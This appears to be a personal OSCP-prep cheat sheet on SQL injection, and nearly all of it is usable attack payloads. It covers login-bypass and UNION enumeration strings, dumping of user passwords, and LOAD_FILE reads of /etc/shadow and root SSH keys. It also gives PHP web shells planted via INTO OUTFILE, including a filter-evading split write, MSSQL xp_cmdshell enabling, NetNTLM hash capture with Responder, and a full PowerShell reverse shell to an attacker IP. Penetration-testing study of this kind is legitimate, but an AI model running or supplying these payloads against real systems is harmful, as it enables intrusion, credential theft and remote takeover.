SQL Injection (SQLi) - Complete Notes

Tooling & Fuzzing
Login Bypass Payloads
SQLi Filtering Bypass
Discovery Workflow (OffSec Flow)
Database Fingerprinting
Enumeration — Schemas / Databases
Enumeration — Tables
Enumeration — Columns
Data Extraction / Dumping
File Read with LOAD_FILE
File Write & RCE via SELECT INTO OUTFILE (MySQL)
MSSQL — xp_cmdshell RCE
References

Tooling & Fuzzing

wfuzz Login Parameter Fuzzing

wfuzz -c -z file,/usr/share/seclists/Fuzzing/Databases/SQLi/quick-SQLi.txt \
  -d "username=john&password=FUZZ&Submit=Login" \
  --hl 42 --hw 66 --hh 851 \
  http://192.168.152.26/checkpoint.php

Useful Wordlists

# login bypass wordlist
cat /usr/share/seclists/Fuzzing/Databases/SQLi/MySQL-SQLi-Login-Bypass.fuzzdb.txt

More Payloads:

https://github.com/payloadbox/sql-injection-payload-list
https://portswigger.net/web-security/sql-injection/cheat-sheet

Classic Bypass

administrator'--
admin'--
'--
admin' OR 1=1 --
admin' OR '1'='1
admin' or '1'='1
' OR '1'='1
%

Comment Variations

offsec' OR 1=1 -- //
admin' OR 1=1 -- //
' -- -'
' //#

In-line Query Bypass (useful for blind/in-band checks)

' ORDER BY 1-- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

SQLi Filtering Bypass

When standard OR is filtered, try the pipe (||) operator:

admin' || 1=1 -- -

Retrieve All Data (GET parameter example)

' OR 1=1--
'+OR+1=1--

GET /filter?category='+OR+1=1--

Discovery Workflow (OffSec Flow)

This is the step-by-step approach for manual UNION-based SQLi enumeration.

Step 1 : Find the Number of Columns

Use ORDER BY incrementing until an error occurs, then drop back one:

' ORDER BY 1-- //
' ORDER BY 2-- //
' ORDER BY 3-- //
-- keep going until error, then you know column count

Also works with Union

' UNION SELECT null,null,null-- -
' UNION SELECT null,null,null,null-- -

Step 2 : Identify Which Columns Are Displayed

Replace NULLs with string markers. If you know there are 5 columns:

%' UNION SELECT 'a1', 'a2', 'a3', 'a4', 'a5' -- //

Or with numeric markers:

admin' UNION select 1,2,3,4,5,6-- -;

Watch the page output : whichever values appear tell you which column positions are reflected.

Step 3 : Enumerate DB Name, User, Version

%' UNION SELECT database(), user(), @@version, null, null -- //
' UNION SELECT null, null, database(), user(), @@version  -- //

Step 4 : Enumerate Tables

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //

-- Without WHERE clause (all tables)
' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns --

Step 5 : Dump Target Table

' UNION SELECT null, username, password, description, null FROM users -- //

Database Fingerprinting

Use these to identify which database is running when you don't know yet.

-- MySQL
' UNION SELECT @@version,NULL-- -

-- PostgreSQL
' UNION SELECT version(),NULL-- -

-- Oracle
' UNION SELECT banner,NULL FROM v$version-- -

-- SQLite
' UNION SELECT sqlite_version(),NULL-- -

-- Oracle (alternate — use DUAL for single row)
'+UNION+SELECT+'abc','def'+FROM+dual--

Enumeration - Schemas / Databases

-- List all schemas
' UNION SELECT null, schema_name, null, null, null FROM information_schema.schemata -- -

-- Compact: all schemas in one field
' UNION SELECT null, GROUP_CONCAT(schema_name), null, null, null FROM information_schema.schemata -- -

-- Current database
' UNION SELECT database(), null, null, null, null -- -

-- All columns filled with same value (for wide tables)
' UNION SELECT schema_name,schema_name,schema_name,schema_name,schema_name FROM information_schema.schemata -- -

-- Filter out system databases
' UNION SELECT schema_name, null, null, null, null 
   FROM information_schema.schemata 
   WHERE schema_name NOT IN ('mysql','information_schema','performance_schema','sys') -- -

Enumeration — Tables

By Database Type

-- MySQL / PostgreSQL
' UNION SELECT table_name, NULL FROM information_schema.tables-- -

-- Oracle
' UNION SELECT table_name, NULL FROM all_tables-- -

-- SQLite
' UNION SELECT name, NULL FROM sqlite_master WHERE type='table'-- -

Targeted / Multi-column Examples

-- All tables in current DB (compact)
' UNION SELECT GROUP_CONCAT(table_name), null, null, null, null 
   FROM information_schema.tables 
   WHERE table_schema = database() -- -

-- Multi-column table
admin' UNION SELECT 1, table_name, 3, 4, 5, 6 FROM information_schema.tables;-- -

-- With metadata
admin' UNION SELECT table_name, table_schema, table_type, create_time, table_rows 
   FROM information_schema.tables-- -

-- Same value in every column (brute-force visible column)
admin' UNION SELECT table_name,table_name,table_name,table_name,table_name 
   FROM information_schema.tables-- -

Enumeration — Columns

-- MySQL / PostgreSQL
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='TABLENAME'-- -

-- Oracle
' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name='TABLENAME'-- -

-- SQLite
' UNION SELECT sql, NULL FROM sqlite_master WHERE name='TABLENAME'-- -

Multi-column Examples

-- 2-column table
' UNION SELECT COLUMN_NAME, NULL FROM information_schema.COLUMNS WHERE TABLE_NAME = 'users_jkwlsa'-- -

-- 6-column table
l1nuxkid' union select 1, column_name, 3, 4, 5, 6 from information_schema.columns; -- -

Data Extraction / Dumping

-- When table/column names are known
' UNION SELECT USERNAME_EBHIGZ, PASSWORD_LYYIVJ FROM USERS_PUVICR-- -
'UNION select USERNAME_EBHIGZ||':'||PASSWORD_LYYIVJ, null from USERS_PUVICR-- -

Concatenation (useful when only 1 column reflects)

-- MySQL
' UNION SELECT CONCAT(username,':',password), NULL FROM users-- -

-- PostgreSQL / Oracle
' UNION SELECT username||':'||password, NULL FROM users-- -

Specific Target (password for admin)

' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

File Read with LOAD_FILE

File Read with LOAD_FILE

Check Privileges First

-- Check if current user has FILE privilege
' UNION SELECT null, super_priv, null, null, null FROM mysql.user WHERE user='current_user()' -- -

-- Check all granted privileges
' UNION SELECT grantee, privilege_type, null, null, null FROM information_schema.user_privileges -- -
' UNION SELECT null, grantee, privilege_type, null, null FROM information_schema.user_privileges -- -

Read Files

' UNION SELECT load_file('/etc/passwd'), null, null, null, null -- -
' UNION SELECT load_file('/etc/shadow'), null, null, null, null -- -
' UNION SELECT load_file('/root/.ssh/id_rsa'), null, null, null, null -- -
' UNION SELECT null, load_file('/etc/hostname'), null, null, null -- -
' UNION SELECT null, load_file('/etc/issue'), null, null, null -- -

Hex-Encode Output (bypass filters / display issues)

' UNION SELECT null, HEX(load_file('/etc/passwd')), null, null, null -- -

File Write & RCE via SELECT INTO OUTFILE (MySQL)

Requirements : The file path must be writable by the OS user running the MySQL process (usually mysql or www-data).

Check Write Access

-- Verify FILE privilege (root access = ALL PRIVILEGES)
' UNION SELECT null, grantee, privilege_type, null, null FROM information_schema.user_privileges -- -

Write a PHP Web Shell

-- OffSec standard approach
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null 
   INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

-- Alternative path (Windows / XAMPP)
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") 
   INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'

Trigger the Web Shell

curl --path-as-is http://192.168.200.19/tmp/webshell.php?cmd=whoami
curl http://TARGET/shell.php?cmd=id
curl http://TARGET/shell.php?cmd=cat+/etc/passwd

Write to Other Locations

-- Write to /tmp
' UNION SELECT "malicious content", null, null, null, null 
   INTO OUTFILE "/tmp/exploit" -- -

-- Append to existing config (eval shell)
' UNION SELECT "\n<?php eval($_POST['x']); ?>", null, null, null, null 
   INTO OUTFILE "/var/www/html/config.php" -- -

Split Write (bypass WAF / length restrictions)

' UNION SELECT "<?php", null, null, null, null INTO OUTFILE "/var/www/html/s.php" -- -
' UNION SELECT "system($_REQUEST", null, null, null, null INTO OUTFILE "/var/www/html/s.php" -- -
' UNION SELECT "['cmd']);", null, null, null, null INTO OUTFILE "/var/www/html/s.php" -- -
' UNION SELECT "?>", null, null, null, null INTO OUTFILE "/var/www/html/s.php" -- -

Test Write (verify shell landed)

' UNION SELECT null, "<?php system('ls -la /var/tmp/webshell.php'); ?>", null, null, null 
   INTO OUTFILE "/var/tmp/test.php" -- -

Execute OS Commands via UDF

' UNION SELECT sys_exec('id'), null, null, null, null -- -

MSSQL — xp_cmdshell RCE

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
💡 Also check HTB Multimaster walkthrough (OSCP+ prep) for full exploitation flow.

Capture NetNTLM Hash via UNC Path (Responder)

abcd'; use master; exec xp_dirtree '\\10.10.14.21\share';-- -

Set up Responder on your end:

sudo responder -I tun0

Enable xp_cmdshell (requires DBA/sysadmin)

Connect with impacket-mssqlclient:

impacket-mssqlclient Administrator:[email protected] -windows-auth

Then enable::

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

One-Liner Enable + Execute (Inject into SQL parameter)

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';

PowerShell Reverse Shell via xp_cmdshell

Simple PowerShell TCP reverse shell:

EXEC xp_cmdshell 'cmd /c powershell -c "$c=New-Object Net.Sockets.TCPClient(''192.168.45.234'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$p=$o+''PS> '';$by=([text.encoding]::ASCII).GetBytes($p);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()"';

Base64-encoded payload (avoids quote escaping issues):

EXEC xp_cmdshell 'powershell -enc <BASE64_ENCODED_PAYLOAD>';

💡 Generate your base64 payload with:

echo -n 'IEX(New-Object Net.Sockets.TCPClient("192.168.45.234",4444))...' | iconv -t UTF-16LE | base64 -w0

Set up listener before executing:

nc -lvnp 4444

References:

Resource

Link

Payload SQLi List

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

PortSwigger Cheat Sheet

https://portswigger.net/web-security/sql-injection/cheat-sheet

PayloadsAllTheThings MSSQL

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md

SecLists SQLi Wordlists

/usr/share/seclists/Fuzzing/Databases/SQLi/

HTB Multimaster (IppSec/0xdf)

Search ippsec multimaster

HTB Stream IO

https://0xdf.gitlab.io/2022/09/17/htb-streamio.html

OSCP+ Notion Notes

N/A

PreviousLigolo-ng OG

Good morning

hashtagTable of Contents

hashtagTooling & Fuzzing

hashtagClassic Bypass

hashtagComment Variations

hashtagIn-line Query Bypass (useful for blind/in-band checks)

hashtagSQLi Filtering Bypass

hashtagRetrieve All Data (GET parameter example)

hashtagDiscovery Workflow (OffSec Flow)

hashtagStep 1 : Find the Number of Columns

hashtagStep 2 : Identify Which Columns Are Displayed

hashtagStep 3 : Enumerate DB Name, User, Version

hashtagStep 4 : Enumerate Tables

hashtagStep 5 : Dump Target Table

hashtagDatabase Fingerprinting

hashtagEnumeration - Schemas / Databases

hashtagEnumeration — Tables

hashtagTargeted / Multi-column Examples

hashtagEnumeration — Columns

hashtagMulti-column Examples

hashtagData Extraction / Dumping

hashtagConcatenation (useful when only 1 column reflects)

hashtagSpecific Target (password for admin)

hashtagFile Read with LOAD_FILE

hashtagCheck Privileges First

hashtagRead Files

hashtagHex-Encode Output (bypass filters / display issues)

hashtagFile Write & RCE via SELECT INTO OUTFILE (MySQL)

hashtagCheck Write Access

hashtagWrite a PHP Web Shell

hashtagTrigger the Web Shell

hashtagWrite to Other Locations

hashtagSplit Write (bypass WAF / length restrictions)

hashtagTest Write (verify shell landed)

hashtagExecute OS Commands via UDF

hashtagMSSQL — xp_cmdshell RCE

hashtagCapture NetNTLM Hash via UNC Path (Responder)

hashtagEnable xp_cmdshell (requires DBA/sysadmin)

hashtagOne-Liner Enable + Execute (Inject into SQL parameter)

hashtagPowerShell Reverse Shell via xp_cmdshell

hashtagReferences:

Table of Contents

Tooling & Fuzzing

Classic Bypass

Comment Variations

In-line Query Bypass (useful for blind/in-band checks)

SQLi Filtering Bypass

Retrieve All Data (GET parameter example)

Discovery Workflow (OffSec Flow)

Step 1 : Find the Number of Columns

Step 2 : Identify Which Columns Are Displayed

Step 3 : Enumerate DB Name, User, Version

Step 4 : Enumerate Tables

Step 5 : Dump Target Table

Database Fingerprinting

Enumeration - Schemas / Databases

Enumeration — Tables

Targeted / Multi-column Examples

Enumeration — Columns

Multi-column Examples

Data Extraction / Dumping

Concatenation (useful when only 1 column reflects)

Specific Target (password for admin)

File Read with LOAD_FILE

Check Privileges First

Read Files

Hex-Encode Output (bypass filters / display issues)

File Write & RCE via SELECT INTO OUTFILE (MySQL)

Check Write Access

Write a PHP Web Shell

Trigger the Web Shell

Write to Other Locations

Split Write (bypass WAF / length restrictions)

Test Write (verify shell landed)

Execute OS Commands via UDF

MSSQL — xp_cmdshell RCE

Capture NetNTLM Hash via UNC Path (Responder)

Enable xp_cmdshell (requires DBA/sysadmin)

One-Liner Enable + Execute (Inject into SQL parameter)

PowerShell Reverse Shell via xp_cmdshell

References: